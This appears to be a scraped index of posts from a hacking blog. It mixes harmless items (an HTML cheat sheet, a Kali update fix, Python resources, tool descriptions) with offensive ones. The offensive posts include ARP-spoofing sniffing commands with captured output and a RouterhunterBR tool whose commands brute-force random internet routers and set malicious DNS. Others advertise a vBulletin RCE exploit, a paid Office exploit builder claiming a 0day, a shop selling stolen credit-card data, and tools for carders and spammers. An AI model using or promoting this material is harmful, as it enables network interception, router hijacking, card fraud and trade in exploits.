Quantcast
Channel: Hack 2 World ®
Viewing all 421 articles
Browse latest View live

HTML Cheat Sheet Free Download

$
0
0

Document Outline

<!DOCTYPE>Version of (X)HTML
<html>….</html>HTML document
<head>….</head>Page information
<body>….</body>Page contests

Comments
<!– Comment Test –>
Page Information
<base />Base URL
<meta />Meta data
<title>….</title>Title
<link />Relevant resource
<style>….</style>Style resource
<script>….</script>Script resource

Document Structure 
<h1>….</h1> to <h6>….</h6>Heading
<div>….</div>Page section
<span>….</span>Inline section
<p>….</p>Paragraph
<br>Line break
<hr>Horizontal rule

Links 
<a href=””>Page link
<a href=”mailto:”>Email link
<a name=”name”>Anchor
<a href=”#name”>Link to anchor

Text Markup
<strong>….</strong>Strong emphasis
<em>….</em>Emphasis
<blockquote>….</blockquote>Long quotation
<q>….</q>Short quotation
<abbr>….</abbr>Abbreviation
<acronym>….</acronym>Acronym
<address>….</address>Address
<pre>….</pre>Pre-formatted text
<dfn>….</dfn>Definition
<code>….</code>Code
<cite>….</cite>Citation
<del>….</del>Deleted text
<ins>….</ins>Inserted text
<sub>….</sub>Subscript
<sup>….</sup>Superscript
<bdo>….</bdo>Text direction


List
<ol>….</ol>Ordered list
<ul>….</ul>Unordered list
<li>….</li>List item
<dl>….</dl>Definition list
<dt>….</dt>Definition term
<dd>….</dd>Term description


Forms
<form>….</form>Form
<fieldset>….</fieldset>Collection of fields
<legend>….</legend>Form legend
<label>….</label>Input label
<input>….</input>Form input
<select>….</select>Drop-down box
<optgroup>….</optgroup>Group of options
<option>….</option>Drop-down options
<textarea>….</textarea>Large text input
<button>….</button>Button


Tables
<table>….</table>Table
<caption>….</caption>Caption
<thead>….</thead>Table body
<tbody>….</tbody>Table body
<tfoot>….</tfoot>Table footer
<colgroup>Column group
<col />Column
<tr>….</tr>Table row
<th>….</th>Header cell
<td>….</td>Table cell

Images and Image Maps
<img />
Image
<map>….</map>
Image Map
<area />
Area of image map
Common Character Entities
&#34;   ”   Quotation mark
&#38;   &   Ampersand
&#60;   <   Less than
&#62;   >   Greater than
&#64;   @  “At” symbol
&#128;  €   Euro
&#149;  •   Small bullet
&#153;  ™  Trademark
&#163;  £   Pound
&#160;       Non-breaking space
&#169;  ©  Copyright symbol
Objects
<object>….</object>
Object
<param />
Parameter
Empty Elements
<area />
<base />
<br />
<col />
<hr />
<img />
<input />
<link />
<meta />
<param />
Core Attributes
Class: id      Style: title
Note: Core attributes may not be used in base, head, html, meta, param, script, style or title elements.
Language Attributes 
dir       lang
Note: Language Attributes may not be used in base, br, frame, framest, hr, iframe, param or script elements.
Keyboard Attributes
accesskey     tabindex
Window Events
onLoad    onUnload
Form Events
onBlur        onReset
onChange   onSelect
onFocus     onSubmit
Keyboard Events
onKeydown   onKeyup
onKeypress
Mouse Events
onClick    onMouseout
onDblclick    onMouseover
onMousedown   onMouseup
onMousemove



How to Fix Kali Linux apt-get Slow Update?

$
0
0

This is a small guide on How to fix Kali Linux apt-get slow update.
How to fix Kali apt-get slow update - blackMORE Ops
Kali is relatively new and got fewer Mirrors than some other distro’s. That means less servers to download from and less servers means more people trying to download from them and using all bandwidth. So when you type in apt-get update, you see a slow download speed for packages. This just means you’re connected to a server that’s really busy. Some users complains that nothing happens or they are not getting any updates at all. Some got different issues like update stuck is header and doesn’t move any further.
To fix this, you need to check a few things:
  1. Check if you have the right repositories is your /etc/apt/sources.list
  2. Remove unwanted or unsupported repositories.
  3. Clean apt-get cache.
  4. Choose a fast DNS server.
To fix sources.list, follow this guide: How to add official Kali Linux Repositories?
To switch repositories to a different mirror of your choice, follow this guide: How to change repositories to a different mirror?

Clean apt-get cache:

apt-get clean

Choose a proper DNS server:

Edit resolv.conf file:
leafpad /etc/resolv.conf

Enter Google DNS nameservers

Following two are Google DNS, let’s face it, if Google is broken, we all think Internet is broken. Hence the reason of using Google DNS. You can choose other DNS Server if you want that are fast and reliable.
nameserver 8.8.8.8
nameserver 8.8.4.4
Now save and close the file.

Test your changes

Let put our changes to the test..

Do an apt-get update

 apt-get update

Do and upgrade

 apt-get upgrade

Finally do a distribution upgrade

 apt-get dist-upgrade
Your download speed should be a lot better than you were getting previously.

Another solution, changing from HTTP to REPO in sources.list file(14/02/2014)

One of the readers advised that by changing the repositories from HTTP to REPO, he gained significant speed up. See Sameer Barha’s comment below.
Use the following repositories (update your sources.list file)
## Kali Regular repositories
deb http://repo.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
## Kali Source repositories
deb-src http://repo.kali.org/kali kali main non-free contrib
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
Instead of
## Kali Regular repositories
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
## Kali Source repositories
deb-src http://http.kali.org/kali kali main non-free contrib
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
This change seems to boost speed as it uses slightly different repo than the usual HTTP servers which are overloaded. Let us know how this worked for you.
In case your sources.list file is messed up or you’re just not sure, what to put on there, follow these instruction’s to add official Kali Linux Repositories.
(Note: The above mentioned repositories are a slightly variant of the official one, you can choose either as they are both from Kali.org)
In case your DNS server is picking up (even Google’s DNS server) a repository from a different country(or avoid a specific country) and you would like to manually switch repositories to a different mirror of your choice(say in same country or just something you know working faster.
Thanks for reading. Please comment your experience to make this guide better. If you’ve found this useful, share and follow us on Facebook/Twitter.

13 Top Python Resources for Beginners!

$
0
0

-This opinionated guide exists to provide both novice and expert Python developers a best-practice handbook to the installation, configuration, and usage of Python on a daily basis. Currently under heavy active development.
-This book instructs you in Python by slowly building and establishing skills through techniques like practice and memorisation, then applying them to increasingly difficult problems. By the end of the book you will have the tools needed to begin learning more complex programming topics.
-Free class for people with a little bit of programming experience who want to learn Python. The class includes written materials, lecture videos, and lots of code exercises to practice Python coding.
-Consists of Python Syntax: a tutorial that will introduce you to Python. Then there’s Tip Calculator: After completing the lesson on Python Syntax it makes you put your new-found skills to use.
-Free, interactive tutorials to help you discover Python idioms, in your browser!
-Includes a great set of resources including Books, MOOCs, Video Tutorials, Interactive tutorials, exercises which can get you started with Python.
-Python Koans is an interactive tutorial for learning the Python programming language by making tests pass. Most tests are fixed by filling the missing parts of assert functions.
-By the end of this course, you’ll have a solid understanding of the Python language, and be able to complete some cool projects in the Code Garage section.
-You’re a new coder. You’re interested in learning how to code, not just syntax. Your hand will be held in the beginning, but as you progress you’ll see yourself approaching the projects more comfortably.
-This book is prepared from the training notes of Anand Chitipothu. Anand conducts Python trainings classes on a semi-regular basis in Bangalore, India.
-The behavior of names and values in Python can be confusing. Like many parts of Python, it has an underlying simplicity that can be hard to discern, especially if you are used to other programming languages. Ned Batchelder explains how it all works, and present some facts and myths along the way.
-Each part of this series will focus on a different common mistake, describe what causes it and offer a solution.
-This website is designed to help you in your learning of Python Programming Language. The website comes with 3 main sections: Learning Python, Practices and Challenges.

Best Programming Languages For Hackers

$
0
0

For Web App Pentesting /Hacking
HTML
Hypertext Markup Language (HTML) is the basics for creating web pages and other information that can be displayed in a web browser. So if you don’t know HTML you should first learn it
JAVAScript
Learning java script. Will help you understand the basics of Cross Site Scripting
PHP/SQL
Majority of web applications are written using PHP and MySQL .So it is a must to learn PHP
For Writing / Understanding Exploits, Shell Codes, Root kits etc
C & C++
More than 60 % of the exploits you will find on the web are written in C & C ++, Learning C & C++ will help you understand about Buffer overflows, Stack overflow etc, So learning C and C ++ is must for every hacker/Pen tester
Assembly
Learning assembly will help you in Writing/understanding Shell codes , Will Help you in Reverse Engineering applications and software’s
For Building Tools And Scripts
Python
Python is a very powerful high level language , Its Easy to learn and code, most of the tools and scripts for automation are written in Python . Knowing Python socket programming will help you a lot in Exploit writing
Ruby
Ruby is an another language which is used to write scripts, tools. Metasploit Frame Work is written in Ruby. so learning ruby will help you understand the in and outs of msf
Bash
Learning Bash is very Useful in writing small scripts for automation
Hope this info helps you, If you have any doubts Regarding the article Please let me know them via comments.

EARN MONEY WITH BITLANDERS

$
0
0
[Image: about-bitlanders.jpg]


bitLanders is a digital platform where users are rewarded for their content and social media leadership. Rewards are powered by the bitMiles technology, and can be exchanged within the curated shopping section for avatar accessories, or be donated to non-profits on bitCharities.com.

Each user on bitLanders is a Digital Citizen represented in the ecosystem by an Avatar, with the opportunity to build their portfolio of Digital Real Estate and support social causes.

bitCharities

With bitCharities, bitLanders becomes a cause marketing platform powered by Bitcoin by connecting brands, non-profits and donors.

bitCharities.com gathers large scale data on its entire user and donor base and shares it at no cost with the participating charities so that they can scale their fundraising efforts with larger corporate sponsors. bitCharities gives back 100% of the donations gathered on its platform to the charities.

While donors can easily, simply, and publicly support a wide range of charitable organizations, brands can align their philanthropic efforts with their customers. bitCharities can engage the first party brand's database and activate them to participate in charitable donations, creating global awareness and a call for action even before any money is spent.

Website Link

NetworkMiner 2.0 - Network Forensic Analysis Tool (NFAT)

$
0
0

NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows (but also works in Linux / Mac OS X / FreeBSD). NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network. NetworkMiner can also parse PCAP files for off-line analysis and to regenerate/reassemble transmitted files and certificates from PCAP files.

NetworkMiner collects data (such as forensic evidence) about hosts on the network rather than to collect data regarding the traffic on the network. The main user interface view is host centric (information grouped per host) rather than packet centric (information showed as a list of packets/frames).

NetworkMiner has, since the first release in 2007, become a popular tool among incident response teams as well as law enforcement. NetworkMiner is today used by companies and organizations all over the world.     

NetworkMiner can extract files and certificates transferred over the network by parsing a PCAP file or by sniffing traffic directly from the network. This functionality can be used to extract and save media files (such as audio or video files) which are streamed across a network from websites such as YouTube. Supported protocols for file extraction are FTP, TFTP, HTTP, SMB and SMTP.

User credentials (usernames and passwords) for supported protocols are extracted by NetworkMiner and displayed under the "Credentials" tab. The credentials tab sometimes also show information that can be used to identify a particular person, such as user accounts for popular online services like Gmail or Facebook.

 Another very useful feature is that the user can search sniffed or stored data for keywords. NetworkMiner allows the user to insert arbitrary string or byte-patterns that shall be searched for with the keyword search functionality.

NetworkMiner Professional comes installed on a specially designed USB flash drive. You can run NetworkMiner directly from the USB flash drive since NetworkMiner is a portable application that doesn't require any installation. We at Netresec do, however, recommend that you copy NetworkMiner to the local hard drive of your computer in order to achieve maximum performance.     
There are several longed-for features that are part of this major release, such as:
  • SMB/CIFS parser now supports file extraction from SMB write operations.
  • Added parser for SMB2 protocol (read and write).
  • Additional IEC-104 commands implemented.
  • Added Modbus/TCP parser (as requested by attendees at 4SICS 2014).
  • Improved SMTP parser.
  • Improved FTP parser.
  • Improved DNS parser.
  • GUI flickering is heavily reduced when loading PCAP files or doing live sniffing.
  • Extraction of web server favicon images (shown in Hosts tab).
  • Added "Keyword filter" to several tabs (see more details below).

Gophish - Open-Source Phishing Toolkit

$
0
0

Gophish is an open-source phishing toolkit designed for businesses and penetration testers. It provides the ability to quickly and easily setup and execute phishing engagements and security awareness training.

One-Click Installation

Download and Extract the ZIP - Gophish binaries are provided for most platforms
Run the Binary Gophish is a standalone, portable binary with static assets.
That's It. - Gophish is now available on http://localhost:3333. Login with admin:gophish

Point-and-Click Phishing

Beautiful Web UI A full web UI makes creating simulated phishing campaigns easy.
Pixel-Perfect Phishing Create pixel-perfect emails and landing pages from scratch or by importing them directly into gophish.

Automate Phishing Campaigns

RESTful API - Gophish is built from the ground-up with a fully-featured JSON API.
Automated Training Use your favorite language or API utility to manage every aspect of your phishing training automatically.

VBScan 0.1.4 - Black Box vBulletin Vulnerability Scanner

$
0
0

VBScan is an opensource project in perl programming language to detect VBulletin CMS vulnerabilities and analyses them.

Why VBScan ?

If you want to do a penetration test on a vBulletin Forum, VBScan is Your best shot ever! This Project is being faster than ever and updated with the latest VBulletin vulnerabilities.

usage :

./vbscan.pl <target>
./vbscan.pl http://target.com/vbulletin

VBScan 0.1.4 [Dennis Ritchie]

  • Changed vulnerability scanner engine
  • Changed default specified timeout to 180 seconds
  • Added VBulletin 5.x RCE Exploit
  • Added txt report output
  • Fixed YUI 2.9.0 XSS false positive
  • Fixed reported bugs

Arpy - Mac OSX Arp Spoof (MITM) Tool

$
0
0

Arpy is an easy-to-use ARP spoofing MiTM tool for Mac. It provides 3 targeted functions: 
  • Packet Sniffing
  • Visited Domains
  • Visited Domains with Gource

Each function will be explained below. 

Tested OS (to date) 
  • Darwin 14.3.0 Darwin Kernel Version 14.3.0 (Mac OS X)

Requirements 
  • Python 2.7
  • Gource
  • Scapy

Installation 

Gource 
brew install gource

Scapy 
pip install scapy

Sample Commands 
ivanvza:~/ > sudo arpy
_____
| _ |___ ___ _ _
| | _| . | | |
|__|__|_| | _|_ |
MiTM Tool |_| |___|
v3.15 -@viljoenivan

Usage: arpy -t <Target IP> -g <Gateway IP> -i <Interface>

ARP MiTM Tool

Options:
-h, --help show this help message and exit
-t TARGET, --target=TARGET
The Target IP
-g GATEWAY, --gateway=GATEWAY
The Gateway
-i INTERFACE, --interface=INTERFACE
Interface to use
--tcp Filters out only tcp traffic
--udp Filters out only udp traffic
-d D_PORT, --destination_port=D_PORT
Filter for a destination port
-s S_PORT, --source_port=S_PORT
Filter for a source port
--sniff Sniff all passing data
--sniff-dns Sniff only searched domains
--sniff-dns-gource Output target's DNS searches in gource format
-v Verbose scapy packet print

Packet Sniff 
This is the packet sniffer, it allows you to see your target's traffic. 
ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff
_____
| _ |___ ___ _ _
| | _| . | | |
|__|__|_| | _|_ |
MiTM Tool |_| |___|
v3.15 -@viljoenivan


[Info] Starting Sniffer...

[Info] Enabling IP Forwarding...
[Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3))

[Info] Found the following (IP layer): 192.168.1.3 -> 46.101.34.90
GET / HTTP/1.1
User-Agent: curl/7.37.1
Host: ivanvza.ninja
Accept: */*



[Info] Found the following (IP layer): 46.101.34.90 -> 192.168.1.3
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Accept-Ranges: bytes
ETag: "2719538271"
Last-Modified: Thu, 30 Apr 2015 08:25:15 GMT
Content-Length: 3213
Date: Fri, 29 May 2015 20:15:06 GMT
Server: Microsoft IIS

<html>
<title>><></title>
<body>
<pre style="line-height: 1.25; white-space: pre;">
\ SORRY /
\ /
\ This page does /
] not exist yet. [ ,'|
] [ / |
]___ ___[ ,' |
] ]\ /[ [ |: |
] ] \ / [ [ |: |
] ] ] [ [ [ |: |
] ] ]__ __[ [ [ |: |
] ] ] ]\ _ /[ [ [ [ |: |
] ] ] ] (#) [ [ [ [ :===='
] ] ]_].nHn.[_[ [ [
] ] ] HHHHH. [ [ [
] ] / `HH("N \ [ [
]__]/ HHH " \[__[
] NNN [
] N/" [
] N H [
/ N \
/ q, \
/ \
</pre>
<h3 id="list"><h3>
</body>
<script>

// NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
var RTCPeerConnection = /*window.RTCPeerConnection ||

DNS Sniff 
This function allows you to see domain names that your target is currently requesting. 
ivanvza:~/ > sudo arpy -t 192.168.1.4 -g 192.168.1.1 -i en0 --sniff-dns
_____
| _ |___ ___ _ _
| | _| . | | |
|__|__|_| | _|_ |
MiTM Tool |_| |___|
- @viljoenivan


[Info] Starting DNS Sniffer...

[Info] Enabling IP Forwarding...
[Info] Done...
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: www.youtube.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s2.googleusercontent.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s.ytimg.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: fonts.gstatic.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: yt3.ggpht.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: i.ytimg.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing.google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.

DNS Sniff With Gource 
This function is more or less the same as the above, however it provides the functionality to pass it through Gource to get a live feed of what your target is viewing. 
ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff-dns-gource
[INFO] For a live gource feed run this command in parallel with this one:

tail -f /tmp/36847parsed_nmap | tee /dev/stderr | gource -log-format custom -a 1 --file-idle-time 0 -

[Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3) and dst port 53)

Sample Gource footage 


AndroL4b - A Virtual Machine For Assessing Android applications, Reverse Engineering and Malware Analysis

$
0
0

AndroL4b is an android security virtual machine based on ubuntu Mate includes the collection of latest framework, tutorials and labs from different security geeks and researcher for reverse engineering and malware analysis.

Tools

RouterhunterBR 2.0 - Automated Tool for Testing in Vulnerable Routers

$
0
0

The RouterhunterBR is an automated security tool que finds vulnerabilities and performs tests on routers and vulnerable devices on the Internet. The RouterhunterBR was designed to run over the Internet looking for defined ips tracks or random in order to automatically exploit the vulnerability DNSChanger on home routers.

The DNSChanger is a trojan able to direct user requests to illegal sites. In practice, this malware has the ability to change the DNS settings of our machine redirecting the user to sites with malicious purposesImagine for example that your system is infected with this malwarewhat might happen is that the user to access a particular site (eg.Facebook.commay be forwarded to an unsolicited website and potentially illegal.

The script explores four vulnerabilities in routers

Requeriments

import sys, os, argparse, itertools, requests, random, time, threading, base64, socket
from datetime import datetime

Usage

  -range 192.168.1.0-255, --range 192.168.1.0-255  Set range of IP
-bruteforce, --bruteforce Performs brute force with users and passwords standards, and soon after defines the malicious DNS.
-startip 192.168.*.*, --startip 192.168.*.* Start - IP range customized with wildcard / 201.*.*.*
-endip 192.168.*.*, --endip 192.168.*.* End - IP range customized with wildcard / 201.*.*.*
-dns1 8.8.8.8, --dns1 8.8.8.8 Define malicious dns1
-dns2 8.8.4.4, --dns2 8.8.4.4 Define malicious dns2
--threads 10 Set threads numbers
-rip, --randomip Randomizing ips routers
-lmtip 10, --limitip 10 Define limite random ip

Commands

Random ips 
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --randomip --limitip 10 --threads 10                      
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 -rip -lmtip 10 --threads 10
Scanner in range ip: 
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --range 192.168.25.0-255 --threads 10
IP range customized with wildcard / Ex: --startip 201.*.*.* - --endip 201.*.*.* 
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --startip 192.168.*.* --endip 192.168.*.* --threads 10
Brute force with users and passwords on routers that requires authentication, forcing alteration of dns - DSLink 260E.
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.4 --range 177.106.19.65-70 --bruteforce --threads 10

Raptor WAF - Web Application firewall to Train Attacks

$
0
0

Raptor is an Open Source Tool, yout focus is study of attacks and find intelligent ways to block attacks.

Raptor is made in pure C, don’t use regex or other common ways to block attacks, yes is diferent and fast like a raptor dinosaur, Raptor follow principle KISS (Keep It Simple), you can use Raptor to simulate attacks and bypasses at wafs.

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and XSS...
  • You can block XSS, SQL injection attacks and path traversal with Raptor
  • You can use blacklist of IPs to block some users at config/blacklist ip.txt
  • You can use IPv6 and IPv4 at communications
  • At the future DoS protector, request limit, rule interpreter and Malware detector at uploads.
  • At the future SSL/TLS...


to run:

$ git clone https://github.com/CoolerVoid/raptor_waf
$ cd raptor_waf; make; bin/raptor

Example

Up some HTTPd server at port 80 
$ bin/Raptor -h localhost -p 80 -r 8883 -w 4 -o loglog.txt
you can test at http://localhost:8883/test.php

Look the docs

https://github.com/CoolerVoid/raptor_waf/blob/master/doc/raptor.pdf 

Tests:

509 of attacks, detect and block 349, 68% of attacks blocked


DOWNLOAD LINK

4n4lDetector v1.1

$
0
0
Fuck what fucking time ago out there!  Now it is the awkward moment when everyone is back to haunt you. If you get into bed and I enfold, raisins heat. If you poke a foot by the end of the sheet, you run the risk of losing the little freeze. If you come out on long pants, even gayumbos merge with the cheeks of your buttocks, and this with perspiration your balls become number one public enemy. Why you the start to sweat all! And if Instead decide to spend the shorts ... date by fucked because something bad has to happen to you, you listen to me ...  this is a no live!


The truth is that I do not want to write the post jajajaa pffffffff ... rather be thrown into the little sun on my terrace sucking flash pole , but as alternatives after a weekend so I was only movidito post something or enter Putalocura , and I know what will be happening, but lately not updated with good content, for that ... I'm losing interest.


So I said ... I will give them to the kids and especially the broads, the new version of my software 4n4lDetector. Jokes aside, I have devoted many hours to make it even more powerful than the previous version, and if I say that I am very happy with the results that this tool is giving me not deceived you. Also I do not have to sell you anything, because everything with me always is free.


What new things brings this version of 4n4lDetector?


If you recall my previous post in which I developed a Crypter to undetectable malware. This used a stub called enelpc.exe , which after use with 4n4lCrypter , the resulting file Crypt.exe finally transport the encrypted malware. This would result both executable dragging the tool.


I have included as are routine screening Droppers , which will work on applications of type Binder , Joiner and Crypters based on stubs .


Following the Crypters , one of the publications indetectables.net by the userMaggicianCOr , was further modified by himself. I decided to download it and use it to check out the encrypted binary, providing a good example to show other information you provide 4n4lDetector .


This new version is studying the possible abundance of strangers, usually randomly generated characters by malware, to include a polymorphism added to the descriptions of the binary generated. The following image shows a polymorphism detection, followed by the amount of code Dropper , and the anomaly after the Entry Point to find a conditional jump JPO , which betrays modification in Visual Basic 6 compiled executable.


If you remember the entry that cifrábamos malware hand rotation algorithms, addition, subtraction and instructions are included XOR after the Entry Point TrojanPoison Ivy . Which also draw the attention of 4n4lDetector and studying the first 25bytes of the starting point for all applications.


Something that could not miss in the execution module, would be the ability to load libraries. Bringing this new version has added a new executable only 2.7 KB , to study their Memory Dumps .


The algorithms responsible for finding executable names have also been improved, so now we have in this section a wider and better information obtained.


A user asked me to be kept in a log extractions, so I prepared a function console tool, where you are if passed as a parameter without quotes of any kind, the name of the executable to be analyzed, this generates a TXT at the root of 4n4lDetector with the name of the application being discussed.


I remember something that had never named in the blog, are the methods Call By Name API or API Call By Hash . These methods are used to invoke the API without declaring them as such. Using the hash algorithms as the name by which to refer to an API or are often call the functions directly loading bookstores with an estimatedLoadLibrary and copying of memory instructions. The malware can use these techniques to hide the static analysis, what are the features you actually use, so it seemed a good idea to incorporate the detection of these methods. The figure below shows a simple Downloader , camouflaging the API URLDownloadToFile .


Strange made me develop methods of antivirus evasion and malware as a hobby and in turn fight as a hobby lol


CVV CHECKER 2016

Private Universal Silent Exploit Builder For Office

$
0
0
Universal Silent Exploit Builder for Office: 2003, 2007, 2010, 2013
Windows: XP, Vista, 7, 8, 8.1, 10
Bits: 32-bit and 64-bit
This is SILENT! Not Macros.Based on https://www.cvedetails.com/cve/CVE-2015-2470/ , https://www.cvedetails.com/cve/CVE-2015-6172/ and another one, which is officially not documented on Microsoft base and not patched yet(0day).



Demonstration USEB on :

Windows 10 Pro 64bit and Office 2013(64bit):


Windows 8.1 64bit and Office 2013(32bit): 
https://vimeo.com/161943897

Windows 7 64bit and Office 2013(32bit): 
https://vimeo.com/162081738

Word: http://viruscheckmate.com/free/#/taskID/aq7Cx2BJmblC
Excel: http://viruscheckmate.com/free/#/taskID/OQZfGdPT48rT

1 month with automatic updates - 1200 USD (private stub 200 USD)
3 month with automatic updates (private stub 400USD) - 2400 USD. Discounts available.

Terms Of Service: 
1. You are not allowed to share/leak the product.
2. You are not allowed to resell the product.
3. You are not allowed to open exploit service based on my builder.
4. There are no refunds. All sales are final.
5. I am in no way responsible how you use this exploit.
6. Scanning it on Virus Distribution Sites will result in permanent ban.
7. I can change ToS any time I want.
8. By purchasing the product you accept this ToS.
9. About problems and questions you need to contact me on my Jabberwriter@darkjabber.cc - z3r0@exploit.im - Yahoointernet.zer0@yahoo.com - Skypeinternet.zero

Twister.name - Only Own Exclusive CVV Bases - EU/USA/Canada/Asia/World

$
0
0


Twister.name - Only Own Exclusive CVV Bases - EU/USA/Canada/Asia/World

DOMAIN :-http://twister.name

Lowest Price Cards :) Visa - Master Cards - American Express - Discover

Country's :-

  • United States
  • Australia
  • United Kingdom
  • Canada
  • France
  • Portugal
  • Brazil
  • Indonesia
  • Spain
  • Germany
  • Italy
  • Norway
  • New Zealand
  • Denmark
  • Ireland
  • Sweden
  • Switzerland
  • Belgium
  • Japan
  • Mexico
  • Turkey
  • Saudi Arabia
  • Netherlands
  • South Korea
  • India, Finland
  • South Africa
  • Greece
  • Israel

-----------------------------------------------------
Admin Jabber Id :-admin@twister.name

Admin Forum Profile Link :-http://moneyflare.com/members/309.html

Hack 2 World Admin Jabber Id :- z3r0@exploit.im

Smart Serial Mail - Spammers Hackers Carders

JCop Hiro Live - Skimmers And Carders

Casit FTP Cracker 2016 Cracked

AWA Multi Socks Scanner V.2 - For Carders And Hackers

Viewing all 421 articles
Browse latest View live




Latest Images